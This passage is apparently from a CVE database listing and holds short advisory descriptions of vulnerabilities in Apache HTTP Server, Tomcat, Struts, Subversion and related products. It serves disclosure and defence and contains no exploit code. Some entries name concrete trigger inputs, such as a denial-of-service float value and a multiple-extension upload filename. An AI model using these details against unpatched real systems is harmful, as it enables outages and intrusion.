13208| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
13209| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
13210| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
13211| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
13212| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
13213| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
13214| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
13215| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
13216| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
13217| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
13218| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
13219| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
13220| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
